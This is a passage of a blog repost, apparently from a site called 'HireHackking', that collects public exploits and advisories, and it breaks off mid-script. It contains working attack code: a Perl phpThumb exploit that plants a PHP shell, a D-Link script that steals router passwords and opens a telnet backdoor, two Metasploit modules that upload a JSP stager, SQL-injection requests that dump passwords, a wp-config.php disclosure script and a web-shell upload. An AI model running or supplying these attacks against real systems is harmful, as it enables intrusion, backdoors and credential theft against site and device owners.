"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr []=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website)); if ($request->is_success) { print "[+] Exploit sent with success. \n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. \n"; sleep(1.3); } print "[*] Checking if the txt shell has been uploaded...\n"; sleep(1.2); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { print "[+] Txt Shell uploaded :) \n"; sleep(1); print "[*] Moving it to PHP format... Please wait... \n"; sleep(1.1); $mvwebsite = "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php? src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv shell.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/components/com_alphacontent/assets/phpThumb/shell.php"; $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { print "[+] PHP Shell uploaded => $cwebsite :) \n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = <STDIN>; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from txt to PHP :( \n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( \n"; }
  13. HireHackking

    D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/64043/info Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks. #!/bin/sh if [ -z "$1" ]; then echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)"; echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b"; echo "usage: $0 [router address] [telnet port]"; exit 0; fi; if [ -z "$2" ]; then TPORT=3333; else TPORT=$2; fi UPORT=31337; echo "Trying $1 ..."; HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`; if [ ! -z "$HTTPASSWD" ]; then L=`echo $HTTPASSWD | cut -d' ' -f1`; P=`echo $HTTPASSWD | cut -d' ' -f2`; echo "found username: $L"; echo "found password: $P"; curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail" 1>/dev/null; if [ $? -eq 0 ]; then curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null; curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null; curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null; echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..." curl -sS "http://$1/logout.php"; 1>/dev/null; fi fi CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e "s/<center>//g"`; if [ ! -z "$CHAP" ]; then echo "found chap-secrets: $CHAP"; fi echo "Bye bye."; exit 0;
  14. HireHackking

    WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    * Exploit Title: WordPress Users Ultra Plugin [Persistence XSS] * Discovery Date: 2015/10/20 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description ======================================================================== ======== Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is taking place before saving package details in DB. This allows a malicious user to include JS code in package name and/or package description. PoC ======================================================================== ======== - - Send a post request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data: `action=package_add_new&p_name=a<script>alert(1)</script>` - - Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin or go to the page that contains package information at front end. Timeline ======================================================================== ======== 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via contact form in his website 2015/11/13 - Vendor notified via support forums at wordpress.org 2015/11/14 - Vendor responded and received report through email Solution ======================================================================== ======== No official solution yet exists.
  15. HireHackking

    Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/64048/info Net-SNMP is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the SNMPD to crash, exhaust CPU resources or trigger infinite loop; denying service to legitimate users. Net-SNMP 5.7.1 is vulnerable; other versions may also be affected. #!/bin/sh SNMPOPTS="-v1 -c public" LUCKYSNMPD=$1 SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD" SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD" SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD" TESTMIB=.1.3.6.1.4.1.8072.2 TESTTELEM=$TESTMIB.5 TESTHDD=$TESTMIB.1.1.2 while true do $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1 for i in 1 2 3 do $SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1 done done
  16. HireHackking

    WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    * Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection] * Discovery Date: 2015/10/19 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description ======================================================================== One can perform an SQL injection attack simply by exploiting the following = WP ajax actions: 1. `edit_video` 2. `delete_photo` 3. `delete_gallery` 4. `delete_video` 5. `reload_photos` 6. `edit_gallery` 7. `edit_gallery_confirm` 8. `edit_photo` 9. `edit_photo_confirm` 10. `edit_video_confirm` 11. `set_as_main_photo` 12. `sort_photo_list` 13. `sort_gallery_list` 14. `reload_videos` POST parameters that are exploitable in each action respectively: 1. `video_id` 2. `photo_id` 3. `gal_id` 4. `video_id` 5. `gal_id` 6. `gal_id` 7. `gal_id` 8. `photo_id` 9. `photo_id` 10. `video_id` 11. `photo_id`, `gal_id` 12. `order` 13. `order` 14. `video_id` In case #7 a user can also change the gallery name, description and visibil= ity by setting POST parameters `gal_name`, `gal_desc` and `gal_visibility` = respectively. In case #8 `photo_id` is first casted to integer and a query to DB is perfo= rmed. If results are returned then for each result a new query is performed= without casting the `photo_id` to integer. So if an attacker knows a valid= video id then it can perform the attack in the second query. This achievab= le because `<?php (int)'1 and sleep(5)' === 1; ?> In case #9 a user can also change the photo name, description, tags and cat= egory by setting POST parameters `photo_name`, `photo_desc`, `photo_tags` a= nd `photo_category` respectively. In case #10 a user can also change the video name, unique id and type by se= tting POST parameters `video_name`, `video_unique_id` and `video_type` resp= ectively. Because function wpdb::get_results() and wpdb::query() are in use here, onl= y one SQL statement can be made per request. This holds severity of the att= ack low. In addition all actions are privileged so the user must have an active acco= unt in vulnerable website, in order to perform the attack. PoC ======================================================================== Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-aja= x.php` with data: `action=edit_video&video_id=1 and sleep(5) ` Timeline ======================================================================== 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via contact form in his website 2015/11/13 - Vendor notified via support forums at wordpress.org 2015/11/14 - Vendor responded and received report through email 2015/12/08 - Vendor provided new version 1.5.63 which resolves issues Solution ======================================================================== Upgrade to version 1.5.63
  17. HireHackking

    Gnome Nautilus 3.16 - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    * Exploit Title: Gnome Nautilus [Denial of Service] * Discovery Date: 2015/10/27 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: https://www.gnome.org/ * Software Link: https://wiki.gnome.org/Apps/Nautilus * Version: 3.16 * Tested on: Ubuntu 14.04, Fedora 22 Description ======================================================================== ======== Gnome Nautilus <= v3.16 is vulnerable to DoS attack through a malicious crafted file. Details - ------------------------------------------------------------------------ - -------- A malicious crafted file can be used to perform a DoS attack in Nautilus. The attacker must have local access to affected system or convince the victim to download the file (email, web url etc.). Next time the victim tries to open the directory that contains the malicious file, Nautilus crashes without warning. The file must have a `.jp2` extension and start with the JPEG signature (`0xFFD8`). Additional Notes - ------------------------------------------------------------------------ - -------- This seems to happen every time Nautilus is trying to update the thumbnail of the file. In Ubuntu and Fedora process dies with the message: ``` Premature end of JPEG file JPEG datastream contains no image ``` This vulnerability seems to affect all Nautilus versions prior to 3.16. PoC ======================================================================== ======== 1. Create a file without a `.jp2` extension in an affected system 2. Open the file in a hex editor so it start with the JPEG signature (`0xFFD8`) 3. Rename the file so it has the `.jp2` extension 4. Open directory with Nautilus 5. Nautilus dies without warning Timeline ======================================================================== ======== 2015/10/27 - Discovered 2015/10/29 - Vendor notified at security@gnome.org Solution ======================================================================== ======== No official solution yet exists. Work-around - ------------------------------------------------------------------------ - -------- Disabling generation of thumbnails for all files, through Nautilus options, will prevent Nautilus from crashing.
  18. HireHackking

    Oracle BeeHive 2 - 'voice-servlet processEvaluation()' Write File (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ '1c239c43f521145fa8385d64a9c32243', # Found the vuln first 'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC) 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2010-4417' ], [ 'ZDI', '11-020' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ] ], 'DefaultOptions' => { 'RPORT' => 7777 }, 'Platform' => 'win', 'Targets' => [ ['Oracle Beehive 2', {}] ], 'Privileged' => true, 'DisclosureDate' => 'Jun 09 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/']) ], self.class) end def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')) if res && /RECXML Prompt Tester/ === res.body return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive') end # Init some names exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe" stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp" print_status("Stager name is: #{stager_name}") print_status("Executable name is: #{exe_name}") # pwd: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home # Targeted path: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa register_files_for_cleanup( "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}" ) # Ok fire! print_status("Uploading stager...") res = upload_stager(stager_name, exe_name) # Hmm if we fail to upload the stager, no point to continue. unless res fail_with(Failure::Unknown, 'Connection timed out.') end print_status("Uploading payload...") upload_payload(stager_name) end # Our stager is basically a backdoor that allows us to upload an executable with a POST request. def get_jsp_stager(exe_name) jsp = %Q|<%@ page import="java.io.*" %> <% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>| # Since we're sending it as a GET request, we want to keep it smaller so # we gsub stuff we don't want. jsp.gsub!("\n", '') jsp.gsub!(' ', ' ') Rex::Text.uri_encode(jsp) end # Stager will be found under: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa\ def upload_stager(stager_name, exe_name) jsp_stager = get_jsp_stager(exe_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp') send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'encode_params' => false, # Don't encode %00 for us 'vars_get' => { 'evaluation' => jsp_stager, 'recxml' => "..\\#{stager_name}%00" } }) end # Payload will be found under: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home\ def upload_payload(stager_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'data' => generate_payload_exe(code: payload.encoded) }) end def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end
  19. HireHackking

    WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    Advisory ID: HTB23275 Product: Gwolle Guestbook WordPress Plugin Vendor: Marcel Pol Vulnerable Version(s): 1.5.3 and probably prior Tested Version: 1.5.3 Advisory Publication: October 14, 2015 [without technical details] Vendor Notification: October 14, 2015 Vendor Patch: October 16, 2015 Public Disclosure: November 4, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8351 Risk Level: Critical CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system. HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request: http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website] In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code. Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise. ----------------------------------------------------------------------------------------------- Solution: Update to Gwolle Guestbook 1.5.4 More Information: https://wordpress.org/plugins/gwolle-gb/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin. [2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
  20. HireHackking

    Oracle BeeHive 2 - 'voice-servlet prepareAudioToPlay()' Arbitrary File Upload (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", 'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. Authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC 'sinn3r' # MSF module ], 'References' => [ [ 'ZDI', '15-550'], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ] ], 'DefaultOptions' => { 'RPORT' => 7777 }, 'Platform' => 'win', 'Targets' => [ ['Oracle Beehive 2', {}] ], 'Privileged' => true, 'DisclosureDate' => "Nov 10 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/']) ], self.class) end def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/')) if res.nil? vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown elsif res && (res.code == 403 || res.code == 200) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet') end # Init some names # We will upload to: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\ exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe" stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp" print_status("Stager name is: #{stager_name}") print_status("Executable name is: #{exe_name}") register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}") # Ok fire! print_status("Uploading stager...") res = upload_stager(stager_name, exe_name) # Hmm if we fail to upload the stager, no point to continue. unless res fail_with(Failure::Unknown, 'Connection timed out.') end print_status("Uploading payload...") upload_payload(stager_name) end # Our stager is basically a backdoor that allows us to upload an executable with a POST request. def get_jsp_stager(exe_name) jsp = %Q|<%@ page import="java.io.*" %> <% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>| # Since we're sending it as a GET request, we want to keep it smaller so # we gsub stuff we don't want. jsp.gsub!("\n", '') jsp.gsub!(' ', ' ') Rex::Text.uri_encode(jsp) end def upload_stager(stager_name, exe_name) # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug) jsp_stager = get_jsp_stager(exe_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp') send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'encode_params' => false, # Don't encode %00 for us 'vars_post' => { 'sess' => "..\\#{stager_name}%00", 'recxml' => jsp_stager, 'audiopath' => Rex::Text.rand_text_alpha(1), 'wavfile' => "#{Rex::Text.rand_text_alpha(5)}.wav", 'evaluation' => Rex::Text.rand_text_alpha(1) } }) end def upload_payload(stager_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'data' => generate_payload_exe(code: payload.encoded) }) end def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end
  21. HireHackking

    Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    ##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE have been assigned Author: Francis Provencher of COSIG Twitter: @COSIG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. (http://www.oracle.com/us/technologies/embedded/025613.htm) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes; 2015-12-02: Malwarebytes release a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. ##################################################################################### =========== 4) POC https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38858.exe
  22. HireHackking

    Enorth Webpublisher CMS - 'thisday' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/64110/info Enorth Webpublisher is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. POST /pub/m_worklog/log_searchday.jsp HTTP/1.1 Host: www.example.com User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn Accept-Encoding: gzip, deflate Cookie: Pragma: no-cache Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 180 thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype=
  23. HireHackking

    NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/64112/info NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. NeoBill 0.9-alpha is vulnerable; other versions may also be affected. $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target]/modules/nullregistrar/phpwhois/example.php?query=[CMD]"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf;
  24. HireHackking

    WordPress Plugin Sell Download 1.0.16 - Local File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    ########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads # ########################################### # # [!] Description : # # Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability # remote attacker can disclosure some local files. # #### <?php // page : sell-downloads.php // lines : 119, 130.. 131 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####
  25. HireHackking

    WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    ########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload / Code Exec / Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://www.wordpress.org # ########################################### # # [!] Description : # # Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities # remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files. # #### <?php // page : upload.php // lines : 1030... 1037 $postData = array(); $postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ################## <?php // page : upload.php // lines : 1219... 1237 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00"); curl_setopt($ch, 